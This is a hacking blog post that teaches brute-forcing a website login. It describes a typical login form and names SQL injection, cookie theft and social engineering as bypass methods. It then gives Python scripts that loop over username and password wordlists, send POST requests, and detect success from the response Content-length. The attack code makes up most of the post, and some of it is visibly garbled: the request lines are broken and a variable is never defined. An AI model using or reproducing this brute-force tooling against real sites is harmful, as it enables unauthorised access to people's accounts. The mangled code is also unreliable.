How to crack an online login

for educational purposes only 

However it is crucial for your path into the world of software, networks and hacking to understand
how those tools actually work behind that nice, comfortable GUI they often offer us.

offer us a way to enter a private section of a website.
You access them using the login credentials you chose to be yours when you first signed up.
If you don’t have any login data you can’t login.
Here’s what a typical login form looks like


<form action=”login.php” method=”POST”>
<input type=”text” name=”username”>
<input type=”password” name=”password”>
<input type=”submit” name=”submit” value=”login”>

The data will be processed in the login.php file, it will check whether you entered the wrong or right username-password combo.

Bypassing login forms
is what hackers do in order to gain access to a private section of a website by either

  1. exploiting database vulnerabilities to find credentials (SQL-Injection)
  2. session hijacking (cookie theft)
  3. social engineering (shoulder surfing)
  4. guessingthe shit out of all possible passwords one could use

There’re a couple of other techniques apart from those mentioned above but we’re going to focus on how to brute-force login credentials since
it offers a great opportunity to learn about networks and protocols as you dig deeper into it.

Password crackers
mostly use dictionary attacks to guess the users or admins password.
Thereby they run through a list of words until they find a word that matches the actual password
I’m using python because it’s easy to read and understand, however I’m not a python god.
I’m using the requests library to fire off post-requests to the web-server that contains the webpage.


import requests

payload ={‘username’:’admin’,’password’:’12345′}
r =“;,data=payload)
print r.headers

I’m importing requests, which you have to install first, then
issue a post-request to the server with the login credentials you declared to be sent in your payload,
‘r.headers’ will return the servers response-header.
Note that ‘username’ and ‘password’ are the names of the input tags in the login form from above.

Now we want to try different passwords and usernames and permute them, therefore our code needs to be rewritten to
import requests
username_list = open(“usrlist.txt”,”r”); #open file with usernames
for x in username_list: #loop through them
password_list = open(“pwlist.txt”,”r”) #open file with pws
for y in password_list: #loop through them
x = x.strip();y = y.strip() #cut off \n
payload ={‘username’:x,’password’:y} #set payload
print “Trying”
print payload
r =“;,data=payload)


Now we have to find a way to signalize that the right username-password combination has been found, which turns out to be fairly difficult sometimes.
One way is to fingerprint the Content-length attribute of the response-header as we send a post-request to the server
that will definitely result in a login failure and later compare that length to the Content-length sent back from each individual attempt.
However, if the server doesn’t allow the Content-length http attribute we’re out of luck, so make sure it’s sent back
by analyzing the server response in Wireshark first.

Here’s what a very simple password cracker script in python might look like
import requests

username_list = open(“usrlist.txt”,”r”);

for x in username_list:
password_list = open(“pwlist.txt”,”r”)
for y in password_list:
x = x.strip();y = y.strip()
payload ={‘username’:x,’password’:y}
print “[!] Trying”
print payload
r =“;,data=payload)
if int(r.headers[‘Content-length’]) != failure_length:
print “Password found!”


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s